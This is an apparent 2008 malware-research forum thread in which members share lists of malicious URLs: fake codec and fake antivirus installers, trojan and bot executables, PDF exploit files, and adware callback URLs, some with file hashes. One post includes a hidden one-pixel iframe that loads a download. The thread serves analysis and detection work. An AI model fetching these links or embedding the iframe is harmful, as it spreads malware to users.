hxxp://mb02.cn/hb/19.exe
hxxp://mb02.cn/hb/20.exe
hxxp://mb02.cn/hb/21.exe
hxxp://mb02.cn/hb/22.exe
hxxp://mb02.cn/hb/23.exe
hxxp://mb02.cn/hb/24.exe
hxxp://mb02.cn/hb/25.exe
hxxp://mb02.cn/hb/27.exe
hxxp://mb02.cn/hb/28.exe
hxxp://mb02.cn/hb/29.exe
hxxp://mb02.cn/hb/30.exe
hxxp://mb02.cn/hb/26.exe
hxxp://mb02.cn/hb/31.exe


Thanks for sharing :)
Title: Re: daily something......
Post by: Kayrac on October 08, 2008, 09:22:37 pm
Code: [Select]
http://www.ecotopo.com.au/
open dir
Title: Re: daily something......
Post by: lanvin on October 10, 2008, 06:54:16 am
hxxp://www.zssotke.edu.sk/zdruzenacik/explorer-7.0.exe

hxxp://blacktie-affair.org/Smileys/Zamiana/stick.gif
||
<iframe width=1 height=1 src="hxxp://download.getmirar.com/875455"> </iframe>
||
hxxp://download.getmirar.com/875455/exes/Mirar_Toolbar_Setup.exe

hxxp://ak.imgfarm.com/images/nocache/copilot/1.0.8.0/iWonSetup1.0.8.0.exe
hxxp://www.cliprex.com/files/Cflv.exe
hxxp://www.cliprex.com/files/CliprexLite.exe
Title: Re: daily something......
Post by: lanvin on October 13, 2008, 02:47:30 pm
hxxp://myprivatetube.net/cd/376/0/wmcodec_update.exe
hxxp://myprivatetube.net/cd/174/0/wmcodec_update.exe
hxxp://scanner.rapidantivirus.com/setup/install_4876_MHw0MXwxMDAwMDAwMDAwfHx8fHx8fHw_.exe
hxxp://www.nortonsoft.com/supportlogic/smilies/video-nude-anjelia.avi.exe
Title: Re: daily something......
Post by: lanvin on October 14, 2008, 02:00:04 pm
hxxp://www.alpha-accz.ws/image.jpg.exe
hxxp://www.alpha-accz.ws/ri0t.exe
hxxp://virus-labs2009.com/distrib/1/virlab_install.exe
hxxp://125.91.10.231/js/suen.exe
hxxp://download.a-a-v-2008.com:8080/AAVSetup.exe
hxxp://www.lastwmpupdate.com/download.php?id=1684
hxxp://www.lastwmpupdate.com/download.php?id=417
hxxp://www.lastwmpupdate.com/download.php?id=1161
hxxp://www.lastwmpupdate.com/download.php?id=1640
hxxp://www.lastwmpupdate.com/download.php?id=1464
Title: Re: daily something......
Post by: JohnC on October 14, 2008, 06:25:38 pm
Thanks.
Title: Re: daily something......
Post by: lanvin on October 15, 2008, 01:04:37 pm
trojan zlob
 
Code: [Select]
trojan zlob
http://ticketmoon.net/download/pageticket2000.exe

fake
http://download.antispywareexpert.com/ASE_Setup_Free.exe
http://download.antispywareexpert.com/ASE_Setup_Free_fr.exe
http://www.xprivatetube.com/cd/26/2001/wmcodec_update.exe
http://www.xprivatetube.com/cd/680/0/wmcodec_update.exe
http://www.xprivatetube.com/cd/184/0/wmcodec_update.exe
http://www.xprivatetube.com/cd/603/4/wmcodec_update.exe
http://xprivatetube.com/cd/wmcodec_update.exe
Title: Re: daily something......
Post by: lanvin on October 19, 2008, 08:16:31 am
Code: [Select]
http://02c1cb8.netsolhost.com/pesa.exe
http://www.administrafacil.com.br/administrafacil.exe
http://downloads.5star-network.com/Internet/amazon.exe
http://downloads.5star-network.com/Internet/wg20.exe
http://downloads.5star-network.com/Utilities/cs_mary.exe
http://download.a-a-v-2008.com:8080/AAVSetup.exe
http://free-stream-videos-here.com/soft/install-299.exe
http://free-stream-videos-here.com/soft/install-301.exe

Title: Re: daily something......
Post by: CM_MWR on October 19, 2008, 09:54:58 am
Code: [Select]
209.62.106.80/CFL/4Ks8J4I1JV0009Lcw3sF0pw2?ts=0
209.62.106.80/CFL/4Ks8J4I1JV0009Lcw3sF0pw2?ts=0000001a
209.62.106.80/CFL/4Ks8J4I1JV0009Lcw3sF0pw2?ts=000003e9
209.62.106.80/K/C2?a=bdlrtpe&k=mpdevlg&wmid=4Ks8J4I1JV&ucid=Lcw3sF0pw2
209.62.106.80/K/F2?a=bdlrtpe&k=mpdevlg&wmid=4Ks8J4I1JV&ucid=Lcw3sF0pw2
209.62.106.80/K/H?a=bdlrtpe&k=mpdevlg&wmid=4Ks8J4I1JV&ucid=Lcw3sF0pw2
209.62.106.80/NL2/?w=4Ks8J4I1JV&ucid=Lcw3sF0pw2&e=00000001&err=00000012
209.62.106.80/NL2/?w=4Ks8J4I1JV&ucid=Lcw3sF0pw2&e=00000003&err=0
209.62.106.80/NL2/?w=4Ks8J4I1JV&ucid=Lcw3sF0pw2&e=0000000a&err=00000012&a=11
209.62.106.80/NL2/?w=4Ks8J4I1JV&ucid=Lcw3sF0pw2&e=0000000a&err=000001e7&a=10
209.62.106.80/PN/104Ks8J4I1JV0009Lcw3sF0pw2
209.62.106.80/PN/114Ks8J4I1JV0009Lcw3sF0pw2
64.225.156.213/xmi2h/awmT251.exe
72.32.209.119/select.php?id=44
72.32.209.119/select.php?id=45
72.32.209.119/select.php?id=56
82.103.138.10/ls/?h=1&c=6480&d=2967&0
82.103.138.10/ls/?h=5a.0gi?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170
82.103.138.10/ls/?t=25
82.103.138.10/ls/?t=4&e=1811&f=13799&l=707
85.17.166.182/cmtr/nd82m0.dll?setid=ish6&affid=166350&uid=56F04722947211DD91DC166350CFFFFF&rid=zdez&guid=FDAAA03B61B248FC94BFC8DD9B70690F
89.18.189.165/img/cntr.dll?sid=FC545F5A4F080F0F000D54585F5F5A5C594F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495B4F0A000D542F2D282828595A2B5F582B5B5D512F2A505D2B2F2A512D2D502B5E595F50592F4F081D545C5F2F595D5E5B5B505D5E5B58582D2D50582D2A585F5F5A5C592A2F2F2F2F2F4F1E1D545D0C5D5D0B5C5B5F59584F0B0054585E5E4F04061B1901000D54001A015F4F1B0C1F000D54505D585B699501
89.188.16.44/bdb/upd105320.dll?setid=ish6&affid=166350&uid=56F04722947211DD91DC166350CFFFFF&guid=FDAAA03B61B248FC94BFC8DD9B70690F&rid=zdez
b152.bundlext.com/ack.php?uid=F4E4961A-08A1-1033-0410-0710070001&version=16&actionname=_regcheck&action=CheckBundle%2E103&success=true&debug=TargetSaver&nocache=2608
b152.bundlext.com/ack.php?uid=F4E4961A-08A1-1033-0410-0710070001&version=16&actionname=_regcheck&action=CheckBundle%2E104&success=true&debug=yes&nocache=3996
b152.bundlext.com/ack.php?version=16&myVer=2&uid=F4E4961A-08A1-1033-0410-070000000001&status=OK&l=19999
b152.bundlext.com/ack.php?version=16&myVer=2&uid=F4E4961A-08A1-1033-0410-070000000001&status=OK&l=36666666666661:80000003|6666666666666666665:0|
b152.bundlext.com/ack.php?version=16&S=ExecOk&l=36666666666661:80000003666666666666666666776666667665:0|
b152.bundlext.com/ack.php?version=16&uid=F4E4961A-08A2-1033-0410-070000000001&status=MayBe_Ok&cb=62.tmp
b152.bundlext.com/ack.php?version=16&uid=F4E4961A-08A2-1033-0410-070000000001&status=OK
b152.bundlext.com/ack.php?version=17&uid=F4E4961A-08A2-1033-0410-070000000001&status=OK_new&cb=4D.tmp
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03F80CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,157:1R0,161:1R0,156:3R0,155:3R0,152:3R0&x=298312&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03F80CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,157:1R0,161:1R0,156:3R0,155:3R0,152:3R0,158:1R0&x=599453&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03F80CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,157:1R0,161:1R0,156:3R0,155:3R0,152:3R0,158:1R0,103:1R0&x=899937&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03F80CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,157:1R0,161:1R0,156:3R0,155:3R0,152:3R0,158:1R0,103:1R0,104:1R0&x=1209390&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03F80CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,157:1R0,161:1R0,156:3R0,155:3R0,152:3R0,158:1R0,103:1R0,104:1R0,116:2R0&x=1510093&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03FB0CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=&i=&x=866906&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03FB0CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,152:3R0&x=1166656&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03FB0CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,152:3R0,155:3R0&x=1467078&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03FB0CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,152:3R0,155:3R0,156:3R0&x=1768890&tst=Am,Am
bugreport.waverevenue.com/gt_bd.php?srky=b143ed367cf5de85adcc2c7002cc3edf&version=92_avn&GUID=398F1596C68A24134386385E03FB0CE3C6832B0F329F39566FF916E3C2832212339B385673B4&cmd=61A847B5BBF728173599284503996897C881250221C8670836AC4FA7C8833201749139&p=1&i=,152:3R0,155:3R0,156:3R0,161:1R0&x=2071515&tst=Am,Am
bugreport.waverevenue.com/gt_ky.php
bugreport.waverevenue.com/rp.txt?uid=F4E4961A-08A2-1033-0410-070000000001&iam=I&st=Ok
dl.targetsaver.com/2k/affupdate2.php?affversion=0.0.0.0&tsversion=4.0.4.1&code=1804289383&aid=109&continent=151481350&country=840&region=11&metro=524&city=3670
dl.targetsaver.com/2k/tsinstall_4_0_4_0_b4.exe
dl.targetsaver.com/2k/tsupdate_4_0_4_1_b3.exe
dl.targetsaver.com/2k/tsupdate2.ini
dl.targetsaver.com/2k/tsupdate2.php
dl.targetsaver.com/redirect.php?clientID=109.-186345958.1804289383&finalURL=http%3A%2F%2Fpopunder.multi-pops.com%2FadsDirect.php%3Fcid%3D7490990%26id%3Dfindology07%26sid%3D73440%26ref%3Dhttp%3A%2F%2Fwww.findology.com&affiliateID=2957&trace=T:
dl2.bundlext.com/get.php?p=26453da423d82a5fc6fae941d05f1151&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=3cd898b13299cb4bc0d5dc64745518ed&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=718f466754402ac597de014577627f96&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=773953af7fc444d491933450d966e0b2&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=8605fbac333a37d112b7d4b2e6de281f&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=93e4c2046fcb4ac4bdc3dbbcc28127fb&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=a537119c47192bc08952189ae8782f08&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=b433b5a80d2cb00f8f1c54387f9aa332&cb2=6900cc07255f403aa633f9364283176b
dl2.bundlext.com/get.php?p=c1f5cc94a30f082054f3a00e6655462d&cb2=6900cc07255f403aa633f9364283176b
flog.virusremover2008.com/?action=18&a=swpsni&l=288&f=pp_1394267317&lp=105&addt=bXRfaW5mbz0zNzkzXzBfMjI5ODA6Mzc4OF8wXzI4NDY3JnN1Yj1VTkQ&pc_id=3159360949&abbr=3P_UVRM_5712_4.3
flog.virusremover2008.com/?action=38&a=swpsni&l=288&f=pp_1394267317&lp=105&addt=bXRfaW5mbz0zNzkzXzBfMjI5ODA6Mzc4OF8wXzI4NDY3JnN1Yj1VTkQ&pc_id=3159360949&abbr=3P_UVRM_5712_4.3
flog.virusremover2008.com/?action=39&a=swpsni&l=288&f=pp_1394267317&lp=105&addt=bXRfaW5mbz0zNzkzXzBfMjI5ODA6Mzc4OF8wXzI4NDY3JnN1Yj1VTkQ&pc_id=3159360949&abbr=3P_UVRM_5712_4.3
flog.virusremover2008.com/?action=5&a=swpsni&l=288&f=pp_1394267317&lp=105&addt=bXRfaW5mbz0zNzkzXzBfMjI5ODA6Mzc4OF8wXzI4NDY3JnN1Yj1VTkQ&pc_id=3159360949&abbr=3P_UVRM_5712_4.3
fstat.cn/in.cgi?id109
fstat.cn/tds/in.cgi?2
italiano-service.org/manage.cgi?27d64e000100f06000cc8136dc068ae61d20026f3d26ccff03656e2d75730000000000
italiano-service.org/manage.cgi?27d64e000100f06002cc8136dc068ae61d20026f3d26ce00030409000000000200
italiano-service.org/manage.cgi?badi
mtn6.com-com.ws/ac.php?bannerid=1&zoneid=1&target=_blank&withtext=&source=&timeout=0&ct0=
mtn6.com-com.ws/aiw3.php?try=1&ver=16&uid=F4E4961A-08A1-1033-0410-070000000001&cu=Dank&cb=7893
mtn6.com-com.ws/aiw3.php?try=1&ver=16&uid=F4E4961A-08A1-1033-0410-070000000001&cu=Dank&cb=802
mtn6.com-com.ws/aiw3.php?try=1&ver=16&uid=F4E4961A-08A2-1033-0410-070000000001&cu=Dank&cb=3006
mtn6.com-com.ws/lg.php?bannerid=1&campaignid=1&zoneid=1&cb=ba37b62fa6
mtn6.com-com.ws/lg.php?bannerid=1&campaignid=1&zoneid=1&cb=f5be0cd602
mtn6.goole.ws/ac.php?bannerid=4&zoneid=3&target=_blank&withtext=&source=&timeout=0&ct0=
mtn6.goole.ws/aiwado.php?xtt=737
mtn6.goole.ws/lg.php?bannerid=4&campaignid=3&zoneid=3&cb=21ba48dacb
myprivatetube.net/1/bigcock1/0/712/0/black/
myprivatetube.net/cd/712/0/wmcodec_update.exe
randomnewnames.com/external/bchanger.exe
randomnewnames.com/v/files/targets.gz
randomnewnames.com/v/we-active.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&d=0&pc=0&pc2=0&country=US
randomnewnames.com/v/we-config.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&ucnt=0
randomnewnames.com/v/we-connect.php
randomnewnames.com/v/we-content.php?cid=356&uid=17646394261871452226&rnd=4322
randomnewnames.com/v/we-content.php?cid=377&uid=17646394261871452226&rnd=327
randomnewnames.com/v/we-content.php?cid=387&uid=17646394261871452226&rnd=6921
randomnewnames.com/v/we-dictionaries.php
randomnewnames.com/v/we-install.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&key=e00f3e0322f287351fc10feff0471412
randomnewnames.com/v/we-popup.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&kw=pussy|fuck&country=US
randomnewnames.com/v/we-popup.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&kw=ron&country=US
randomnewnames.com/v/we-tpa.php?uid=17646394261871452226&cfgid=100&aid=28&v=21&d=0
randomnewnames.com/v/we-tpa-track.php?name=bchanger.exe
speed-runner.com/./data/configs/INSTALLS/config.cfg
speed-runner.com/./data/speedrunner/uninstaller/sruninstaller.prod.v12000.11jan2008.exe.1ac39aea6b22cdb4e6ed0c75f1d83467
speed-runner.com/upd.php?wtdat=1061a99f58f7c7961801b5fd0ebe6d5edd0bcb8d5001b123fe3053941a1076be9ef59850dce64ebe8c6dd2b410527036
speed-runner.com/upd.php?wtdat=677f31fe4cd508bb6c15061542e61381
spyguardpro.com/data/?cmpname=swpsnpr34&gai=swp_snipsg&gli=288&gff=pp_1389567286&ex=5&ed=2&eu=http%3A%2F%2Fpcprivacytool.com%2Fprivacy%2F%3Fp%3D840%26gai%3Dswp_snipsgexx51%26gli%3D288%26gff%3Dpp_1389567286%26ex%3D5&
virusremover2008plus.com/secure/5e7da2d5e3beca6d6d7f9548cf0fb655/48eb60d5/VirusRemover2008_Setup_Free_en.exe?a=swpsni&l=288&f=pp_1394267317&p=105&mt_info=3793_0_22980:3788_0_28467&sub=UND
wrpx.service.mirror-image.net/binaries/installer.php?a=MTE3MTk6ODoxNg
wrpx.service.mirror-image.net/binaries/installer.php?a=MTE5MTA6ODoxNg
wrpx.service.mirror-image.net/binaries/relevance.dat
Title: Re: daily something......
Post by: JohnC on October 19, 2008, 11:49:35 am
Thanks.
Title: Re: daily something......
Post by: SysAdMini on October 20, 2008, 08:04:13 am
Code: [Select]
hxxp://online-scan.net/jktnslbngksjhgktiyyorrfkgmtt.js
Title: Re: daily something......
Post by: philipp on October 21, 2008, 11:43:00 am
Code: [Select]
http://peterharris.com.au/lsys/lscan2.exe (c1b7ea81f3f8517a89f568ad6f416040)
http://marsdenpilgrimages.com.au/lsys/lscan2.exe (c1b7ea81f3f8517a89f568ad6f416040)
http://eternityevents.com.au/lsi/skash.exe (c37a11e2fca56c28ba45f5343968a870)
http://www.ecotopo.com.au/images/lspr.exe (0d1906f9157962d5d2235e803e392720)
http://www.ecotopo.com.au/images/kashi.exe (15113ee714454f223a169fde831e4d15)
http://www.ecotopo.com.au/images/rep.exe (a217cdb07aa1bc2dad954dd2bd30f52c)
http://utevox.site90.com/f/load.php?id=15835&spl=2 (4e56b5b89502be8eec70954de3339026)
http://life-tablets.cn/fi/load.php?id=1916&spl=1 (91bf8e0015765cd806f1046afa2c05da)
http://www.business-from-home.de/flash/install_flash_player.exe (92d7aa2c6555d5aa9e710183043ec350)
http://codecdownload.i-softportal.net/xcodec.281.exe (8e133c59afe4a74f0e236426fe544707)
http://dab-bank.demeinedabbank.login.app.comservlet.5cjskyec6secbps.sitesurvey.exacttrget.binzytvf.com/DABDigicertx.509.exe (5325777dae2dc88492d0b4e01a75320a)
http://omalissi.com.ar/pornivideo03y45i.exe (a42c5666512be0ac9572bb563d103afd)
http://www.mediamovware.com/download.php?id=1018 (d4e2892b8281943e1a06f3a6fb089c69)
Title: Re: daily something......
Post by: lanvin on October 22, 2008, 07:37:45 am
Code: [Select]
http://www.vivotorpedo.us/sms/foto/torpedo/macromediaflashinstall.exe
http://www.txjsrf.com/img/1x1_pix.gif
http://a158158.googlepages.com/AbsoluteSoundRecorderarbic.exe
http://myweb.saudi.net.sa/l33t/omg.exe
http://www.free-winks.info/data/msgthemes_worldcup.exe
http://cj.366ent.com/news/user/setup1438.txt
http://2008.366ent.com/2008/soft/upsetup.exe
http://cj.366ent.com/news/update.txt
http://www.free-winks.info/downloads/free-msn-emoticons-pack-02-setup.exe
http://www.free-winks.info/downloads/free-msn-emoticons-pack-01-setup.exe
Title: Re: daily something......
Post by: JohnC on October 23, 2008, 02:30:49 pm
Thanks.
Title: Re: daily something......
Post by: lanvin on October 24, 2008, 04:37:52 pm
Code: [Select]
http://www.726380.cn/001/022.exe
http://www.adwareblaster.com/download/bpssr.exe
http://save-my-pc-now.com/2009/download/trial/A9installer_770522166818.exe
http://www.antispyware-xp2009.com/install/Installer.exe
http://contenteraser.com/privacy/js/order.js
Title: Re: daily something......
Post by: lanvin on October 28, 2008, 07:00:28 am
Code: [Select]
****http://67.15.107.166/winzix/070529/winzix-1.0-setup-0001.exe
http://ad.ote2008.info/ad.css
http://knut.kumoh.ac.kr/~kopress/board//skin/f2plus_gallery_2_0/.tmp/FrWall2.exe
http://dd4.tesekl.info/not.exe
http://dd6.tesekl.info/net.exe
http://www.ieqpatobranco.com.br/fotos.exe
http://cri66.web.cedant.com/windows.exe
http://avzhan.3322.org:81/1.exe****
Title: Re: daily something......
Post by: lanvin on October 29, 2008, 04:56:40 pm
Code: [Select]
http://61.160.213.143/wl.css
http://61.160.213.143/ma/cw01.exe
http://61.160.213.143/ma/cw02.exe
http://61.160.213.143/ma/cw03.exe
http://61.160.213.143/ma/cw04.exe
http://61.160.213.143/ma/cw05.exe
http://61.160.213.143/ma/cw06.exe
http://61.160.213.143/ma/cw07.exe
http://61.160.213.143/ma/cw08.exe
http://61.160.213.143/ma/cw09.exe
http://61.160.213.143/ma/cw10.exe
http://61.160.213.143/ma/cw11.exe
http://61.160.213.143/ma/cw12.exe
http://61.160.213.143/ma/cw13.exe
http://61.160.213.143/ma/cw14.exe
http://61.160.213.143/ma/cw15.exe
http://61.160.213.143/ma/cw16.exe
http://61.160.213.143/ma/cw17.exe
http://61.160.213.143/ma/cw18.exe
http://61.160.213.143/ma/cw19.exe
http://61.160.213.143/ma/cw20.exe
http://61.160.213.143/ma/cw21.exe
http://61.160.213.143/ma/cw22.exe
http://61.160.213.143/ma/cw23.exe
http://61.160.213.143/ma/cw24.exe
http://61.160.213.143/ma/cw25.exe
http://61.160.213.143/ma/cw26.exe
http://61.160.213.143/ma/cw27.exe
http://61.160.213.143/ma/cw28.exe
http://61.160.213.143/ma/cw29.exe
http://61.160.213.143/ma/cw30.exe
Title: Re: daily something......
Post by: CM_MWR on October 30, 2008, 08:52:43 am
Code: [Select]
http://88.llxslaile1.com/1.exe
http://88.llxslaile1.com/2.exe
http://88.llxslaile1.com/3.exe
http://88.llxslaile1.com/4.exe
http://88.llxslaile1.com/5.exe
http://88.llxslaile1.com/6.exe
http://88.llxslaile1.com/7.exe
http://88.llxslaile1.com/8.exe
http://88.llxslaile1.com/9.exe
http://88.llxslaile1.com/10.exe
http://ffies.cn/shf/data0.mdb
http://ffies.cn/shf/skep.mdb
http://ffies.cn/shf/data1.mdb
http://ffies.cn/shf/fd05.mdb
http://m.c5x8.com/mm.exe
---------------------------
http://www.oiuyt.net/ko.txt
url1=http://61.164.118.208/new/new1.exe
url2=http://61.164.118.208/new/new2.exe
url3=http://61.164.118.208/new/new3.exe
url4=http://61.164.118.208/new/new4.exe
url5=http://61.164.118.208/new/new5.exe
url6=http://61.164.118.208/new/new6.exe
url7=http://61.164.118.208/new/new7.exe
url8=http://61.164.118.209/new/new8.exe
url9=http://61.164.118.209/new/new9.exe
url10=http://61.164.118.209/new/new10.exe
url11=http://61.164.118.209/new/new11.exe
url14=http://61.164.118.209/new/new14.exe
url15=http://61.164.118.209/new/new15.exe
url16=http://59.34.216.225/new/new16.exe
url17=http://59.34.216.225/new/new17.exe
url18=http://59.34.216.225/new/new18.exe
url19=http://59.34.216.225/new/new19.exe
url20=http://59.34.216.225/new/new20.exe
url21=http://59.34.216.225/new/new21.exe
url22=http://59.34.216.225/new/new22.exe
url23=http://59.34.216.225/new/new23.exe
url24=http://59.34.216.225/new/new24.exe
url25=http://59.34.216.225/new/new25.exe
url26=http://59.34.216.143/new/new26.exe
url27=http://59.34.216.143/new/new27.exe
url28=http://59.34.216.143/new/new28.exe
url29=http://59.34.216.143/new/new29.exe
url30=http://59.34.216.143/new/new30.exe
url31=http://59.34.216.143/new/new31.exe
url32=http://59.34.216.143/new/new32.exe
url33=http://59.34.216.143/new/new33.exe
url34=http://59.34.216.143/new/new34.exe
http://www.e-cut.ru/img/uname.exe
http://www.dendoelderpallets.eu/file/uname.exe
http://35122.ds.nac.net/.www.sapo.pt/oficceupdate.exe
http://209.123.8.48/.www2.sapo.pt/firewall.exe
Title: Re: daily something......
Post by: lanvin on October 31, 2008, 04:10:02 pm
Code: [Select]
http://tucows.netnitco.net/files/Setup_Registry_Defender.exe
http://www.pagefactorytest.nl/vvv/components/com_jce/videos.exe
http://www.ghiath.com/files/util/RRT.exe
http://ia-scanpro.com/download/IAInstalld.exe
http://ia-scanpro.com/download/IAInstall.exe
http://www.lwstats.com/11/PLAY-MOVIE.exe
Title: Re: daily something......
Post by: SysAdMini on November 04, 2008, 12:44:32 am
Code: [Select]
http://bot.10wrj.com/bot1102.exe
http://so.91526.com/jj.exe
Title: Re: daily something......
Post by: sowhat-x on November 04, 2008, 02:19:29 am
Code: [Select]
http://freegoogla.vicp.net/download/em_setup.exe
http://zz.ushealthmart.com/download/6767.exe
Title: Re: daily something......
Post by: sowhat-x on November 05, 2008, 12:17:21 pm
...since a few days passed since the fuzz around the ms08-067 worm,
thought it's about time to move these here as well...  ;)
Quote
hxxp://zz.ushealthmart.com/download/67.exe
hxxp://www.ushealthmart.com/kernel/cmd.txt
hxxp://ce.10wrj.com/10wrjcenew.exe
hxxp://freegoogla.vicp.net/download/Loader.exe
hxxp://ls.cc86.info/mimi.1268772
hxxp://ls.lenovowireless.net/mimi.1268772
hxxp://ls.playswomen.com/mimi.1268772
hxxp://st.ushealthmart.com/download/webcc.exe
Title: Re: daily something......
Post by: lanvin on November 05, 2008, 07:18:43 pm
Code: [Select]
http://bot.10wrj.com/bot1102.exe
http://so.91526.com/jj.exe

thank you ;D
Title: Re: daily something......
Post by: lanvin on November 05, 2008, 07:25:30 pm
...since a few days passed since the fuzz around the ms08-067 worm,
thought it's about time to move these here as well...  ;)
Quote
hxxp://zz.ushealthmart.com/download/67.exe
hxxp://www.ushealthmart.com/kernel/cmd.txt
hxxp://ce.10wrj.com/10wrjcenew.exe
hxxp://freegoogla.vicp.net/download/Loader.exe
hxxp://ls.cc86.info/mimi.1268772
hxxp://ls.lenovowireless.net/mimi.1268772
hxxp://ls.playswomen.com/mimi.1268772
hxxp://st.ushealthmart.com/download/webcc.exe

thank you ;)
Title: Re: daily something......
Post by: lanvin on November 08, 2008, 06:55:07 pm
Code: [Select]
http://www.interfejs.tv/download/MediaCellConverterSetup.exe
117.23.205.227/new/001.cab
117.23.205.227/new/002.cab
117.23.205.227/new/003.cab
117.23.205.227/new/004.cab
117.23.205.227/new/005.cab
117.23.205.227/new/006.cab
117.23.205.227/new/007.cab
117.23.205.227/new/008.cab
117.23.205.227/new/009.cab
117.23.205.227/new/010.cab
http://www.flaxweb.org/botnet1/bot_stuff/bot1.exe
http://193.27.246.185/zx/xvid.exe
http://alwayssam.com/lal222.exe
Title: Re: daily something......
Post by: sowhat-x on November 09, 2008, 01:26:20 am
Various pdf-exploit variants,and different detection rates for the time being...
Quote
hxxp://218.93.205.42/cache/doc.pdf
hxxp://megsrdomain.cn/tor/exploits/pdf/2.pdf
hxxp://myfrooogle.cn/z/cache/doc.pdf
hxxp://nudeteens.in/4/cache/doc.pdf
Title: Re: daily something......
Post by: sowhat-x on November 09, 2008, 07:01:54 am
Quote
hxxp://0012.ff-freehosting.com/vip/pdf.php?id=148754
hxxp://0012.ff-freehosting.com/vip/pdf.php?id=18802
hxxp://0012.ff-freehosting.com/vip/pdf.php?id=20408
hxxp://0012.ff-freehosting.com/vip/pdf.php?id=4777
hxxp://0012.ff-freehosting.com/vip/pdf.php?id=72811
hxxp://0012.ff-freehosting.com/vip/pdf.php?id=9678
hxxp://2.formybro.info/sis/getfile.php?f=pdf
hxxp://2.formybro.info/sis/getfile.php?f=vispdf
hxxp://59.125.229.78/tube/7/pdf.php?id=571
hxxp://78.157.142.122/us.pdf
hxxp://79.135.167.18/cgi-bin/index.cgi?16ee347b0100f060018c51855506ea6e98df025e5815210003000c000002bc17
hxxp://79.135.167.18/cgi-bin/index.cgi?c5c3b24c0100f060018c518555060c6ab3b1028d77d1970003000c000002bc17
hxxp://abb192.cn/exp/pdf.php?id=5093
hxxp://abb192.cn/spl3/pdf.php?id=14
hxxp://abc801.cn/exp/pdf.php?id=1619
hxxp://adultworld.name/new2/pdf.php
hxxp://bar-moscow.ru/2/sploits/test.pdf
hxxp://blonde.ff-freehosting.com/all/pdf.php?id=269235
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=116190
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=12768
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=244399
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=462713
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=49801
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=7121
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=76961
hxxp://blonde.ff-freehosting.com/vip/pdf.php?id=80963
hxxp://buterik.com/123/opdf.php
hxxp://dortumosio.com/adsl1/pdf.php
hxxp://dortumosio.com/adsl2/pdf.php
hxxp://dzenmoney.cn/pdf.php?id=2
hxxp://eliriumsoft.com/sup/cache/doc.pdf
hxxp://fdfgsdfvsdss.eu/webpage1/spl/pdf.pdf
hxxp://fiesta.1clinux.ru/pdf.php?acc=102&id=1
hxxp://golpii.com/25/1/getfile.php?f=pdf
hxxp://golpii.com/25/1/getfile.php?f=vispdf
hxxp://golpii.com/25/2/getfile.php?f=pdf
hxxp://golpii.com/25/2/getfile.php?f=pdf
hxxp://golpii.com/25/3/getfile.php?f=pdf
hxxp://golpii.com/25/3/getfile.php?f=vispdf
hxxp://google-moogle.net/fiesta/pdf.php?id=3858
